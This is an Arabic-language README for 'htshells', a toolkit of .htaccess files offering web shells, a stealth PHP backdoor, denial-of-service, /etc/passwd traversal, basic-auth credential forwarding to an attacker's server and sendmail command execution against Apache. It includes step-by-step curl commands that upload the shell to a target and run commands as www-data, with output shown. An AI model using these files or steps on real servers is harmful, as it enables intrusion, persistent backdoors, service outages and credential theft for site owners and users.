
أصداف وهجمات htaccess مكتفية ذاتيًا
HTSHELLS - صدفات ويب مكتفية ذاتيًا وهجمات أخرى عبر ملفات .htaccess.
تُسمى الهجمات بالطريقة التالية: module.attack.htaccess، وتُجمَّع حسب نوع الهجوم في مجلدات. اختر ما تحتاجه وانسخه إلى ملف جديد باسم .htaccess، وافحص الملف لمعرفة ما إذا كان يحتاج إلى تعديل قبل رفعه. تنفذ صدفات الويب الأوامر من معامل الاستعلام c، ما لم ينص الملف على خلاف ذلك.
للتجهيز، شغّل ./prepare.sh file والذي سيُنشئ ملف .htaccess الذي سيتم رفعه. مثال:
$ ./prepare.sh shell/mod_php.shell.htaccess
┬ ┬┌┬┐┌─┐┬ ┬┌─┐┬ ┬ ┌─┐
├─┤ │ └─┐├─┤├┤ │ │ └─┐
┴ ┴ ┴ └─┘┴ ┴└─┘┴─┘┴─┘└─┘
justanotherhacker.com
.htaccess file is ready
$ curl -F '[email protected]' -k https://target/upload.php
$ curl -k https://target/uploads/.htaccess?c=id
...
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
== DOS/ # هجمات حجب الخدمة
apache.dos.htaccess يجعل جميع الطلبات ترجع خطأ خادم داخلي 500
mod_rewrite.dos.htaccess شرط حجب خدمة (DoS) بتعبير نمطي في mod_rewrite يستهلك عملية فرعية
== INFO/ # هجمات الكشف عن المعلومات
modcheck/ يتضمن ترويسات استجابة إضافية للإشارة إلى وحدات Apache النشطة
mod_caucho.info.htaccess غير مُختبر ربط حالة الخادم لوحدة خادم Resin java الخاصة بـ mod_caucho
mod_clamav.info.htaccess ربط صفحة حالة Clamav
mod_info.info.htaccess ربط معلومات الخادم لـ Apache
mod_ldap.info.htaccess غير مُختبر ربط حالة الخادم لوحدة خادم mod_ldap
mod_perl.info.htaccess عرض صفحة حالة mod_perl
mod_php.info.htaccess اجعل جميع صفحات php تعرض المصدر بدلاً من تنفيذه
mod_status.info.htacces ربط حالة الخادم لـ Apache
== SHELL/ # تنفيذ أوامر تفاعلي
mod_caucho.shell.htaccess غير مُختبر صدفة ويب قائمة على JSP
mod_cgi.shell.bash.htaccess صدفة تستخدم bash عبر معالج cgi، وتتطلب تعيين علامة exec على ملف htaccess.
mod_cgi.shell.windows.htaccess غير مُختبر توفر صدفة عبر php.exe من خلال توجيهات إعداد cgi في Apache
mod_include.shell.htaccess صدفة ويب مبنية على Server Side Include
mod_multi.shell.htaccess صدف متعددة في ملف .htaccess واحد، بنهج هجمة واحدة تناسب الجميع
mod_perl.shell.htaccess غير مكتمل TODO
mod_php.shell.htaccess الوصول إلى صدفة ويب مبنية على PHP عبر http://domain/path/.htaccess?c=command
mod_php.shell2.htaccess طريقة بديلة لاستدعاء صدفة php من ملف .htaccess
mod_php.stealth.shell.htaccess باب خلفي خفي مبني على PHP - راجع http://www.justanotherhacker.com/2011/12/writing-a-stealth-web-shell.html للحصول على البرنامج التعليمي
mod_python.shell.htaccess
mod_ruby.shell.htaccess
mod_suphp.shell.htaccess
== TRAVERSAL/ # هجمات اجتياز الدلائل
mod_hitlog.traversal.htaccess هجمة اجتياز دلائل عبر وحدة hitlog تحاول قراءة /etc/passwd
mod_layout.traversal.htaccess هجمة اجتياز دلائل تقرأ /etc/passwd
== ./ # هجمات متنوعة
mod_auth_remote.phish.htaccess غير مُختبر تمرير بيانات اعتماد المصادقة الأساسية إلى خادم من اختيارك
mod_badge.admin.htaccess ربط صفحة إدارة mod_badge
mod_sendmail.rce.htaccess غير مُختبر ينفذ أوامر مهيأة في ملف .htaccess عن طريق تحديد المسار والوسائط لثنائي "sendmail"
Wireghoul - http://www.justanotherhacker.com